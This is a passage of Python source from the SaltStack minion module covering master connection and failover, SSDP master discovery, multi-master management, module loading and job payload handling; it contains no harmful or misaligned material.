@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minion's initialization
phase (for example from the minion's main event loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
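# Illustrative minion config (assumed hostnames) for the failover handling
# implemented below:
#   master_type: failover
#   master:
#     - master1.example.com
#     - master2.example.com
#   master_alive_interval: 30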
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending on the networking and the set of masters.
# if we are using multimaster, discovery can only happen at start time
# because MinionManager handles it. by eval_master time the minion doesn't
# know about other siblings currently running
if isinstance(self.opts['discovery'], dict) and not self.opts['discovery'].get('multimaster'):
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'%s\'.', opts['master'][0])
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
log.warning(
'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
'of \'random_master\'. Please update your minion config file.'
)
opts['random_master'] = opts['master_shuffle']
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minions have to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
last_exc = None
opts['master_uri_list'] = []
opts['local_masters'] = copy.copy(opts['master'])
# shuffle the masters and then loop through them
if opts['random_master']:
# master_failback is only used when master_type is set to failover
if opts['master_type'] == 'failover' and opts['master_failback']:
secondary_masters = opts['local_masters'][1:]
shuffle(secondary_masters)
opts['local_masters'][1:] = secondary_masters
else:
shuffle(opts['local_masters'])
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
try:
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
if exc.strerror.startswith('Could not access'):
msg = (
'Failed to initiate connection with Master '
'%s: check ownership/permissions. Error '
'message: %s', opts['master'], exc
)
else:
msg = ('Master %s could not be reached, trying '
'next master (if any)', opts['master'])
log.info(*msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
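# Illustrative SSDP discovery config (values are assumptions) matching the
# keys read below:
#   discovery:
#     attempts: 3
#     pause: 5
#     match: any
#     mapping:
#       description: my-master
#     multimaster: True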
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Master discovery attempt %s', att)
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: %s', err)
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "%s". '
'Should be "any" or "all"', policy)
return
mapping = self.opts['discovery'].get('mapping', {})
discovered = []
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if (policy == 'any' and bool(cnt)) or cnt == len(mapping):
if self.opts['discovery'].get('multimaster'):
discovered.append(proto_data['master'])
else:
self.opts['master'] = proto_data['master']
return
self.opts['master'] = discovered
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to %s seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug('%s (randomized)', msg % random_retry)
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg, DEFAULT_MINION_OPTS['return_retry_timer'])
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg, self.opts.get('return_retry_timer'))
return self.opts.get('return_retry_timer')
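# Illustrative minion config (assumed values) for the randomized return retry
# timer above; with these settings the timer is picked between 5 and 10 seconds:
#   return_retry_timer: 5
#   return_retry_timer_max: 10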
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
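# Illustrative usage (a sketch, assuming a standard minion config path and a
# reachable master, or file_client: local):
#   opts = salt.config.minion_config('/etc/salt/minion')
#   sminion = SMinion(opts)
#   sminion.functions['test.ping']()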
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# run ssdp discovery if necessary
self._discover_masters()
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi-minion interface; this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # Tornado backward compat
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _check_minions(self):
'''
Check the size of self.minions and log an error if it's empty
'''
if not self.minions:
err = ('Minion unable to successfully connect to '
'a Salt Master.')
log.error(err)
def _spawn_minions(self, timeout=60):
'''
Spawn all the coroutines which will sign in to masters
'''
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending on the networking and the set of masters. If match is 'any' we let
# eval_master handle the discovery instead so disconnections can also handle
# discovery
if isinstance(self.opts['discovery'], dict) and self.opts['discovery'].get('multimaster'):
self._discover_masters()
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue)
self.io_loop.spawn_callback(self._connect_minion, minion)
self.io_loop.call_later(timeout, self._check_minions)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
if failed:
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
log.debug(
"sleeping before reconnect attempt to %s [%d/%d]",
minion.opts['master'],
auth_wait,
self.max_auth_wait,
)
yield tornado.gen.sleep(auth_wait) # TODO: log?
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
self.minions.append(minion)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
except SaltMasterUnresolvableError:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. ' \
'Set \'master\' value in minion config.'.format(minion.opts['master'])
log.error(err)
break
except Exception as e:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = [] if jid_queue is None else jid_queue
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'random_startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True})
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
if self._connect_master_future.done():
future_exception = self._connect_master_future.exception()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
async_pillar = salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
)
self.opts['pillar'] = yield async_pillar.compile_pillar()
async_pillar.destroy()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minion's scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None, opts=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
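# Illustrative minion config (assumed value) for the memory cap enforced
# below; the limit is added on top of the current RSS+VMS of the process:
#   modules_max_memory: 500000000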
opt_in = True
if not opts:
opts = self.opts
opt_in = False
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
'modules_max_memory set, enforcing a maximum of %s',
opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
opts['grains'] = salt.loader.grains(opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(opts, proxy=proxy)
if opts.get('multimaster', False):
s_opts = copy.deepcopy(opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(opts, functions, proxy=proxy)
if opt_in:
self.opts = opts
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.ReqChannel.factory(self.opts)
try:
return channel.send(load, timeout=timeout)
finally:
channel.close()
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
try:
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
finally:
channel.close()
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
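# Illustrative call (tag and data are assumptions): fire a custom event onto
# the master event bus.
#   self._fire_master({'status': 'ok'}, 'custom/minion/status')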
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
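# Typical shape of the decoded ``data`` payload handled here (illustrative;
# the field values are assumptions):
#   {'jid': '20190101000000000000', 'fun': 'test.ping', 'arg': [],
#    'ret': '', 'user': 'root'}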
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
process_count_max_sleep_secs = self.opts.get('process_count_max_sleep_secs')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning('Maximum number of processes (%s) reached while '
'executing jid %s, waiting %s seconds...',
process_count_max,
data['jid'],
process_count_max_sleep_secs)
yield tornado.gen.sleep(process_count_max_sleep_secs)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance reference to allow for socket
# communication on Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
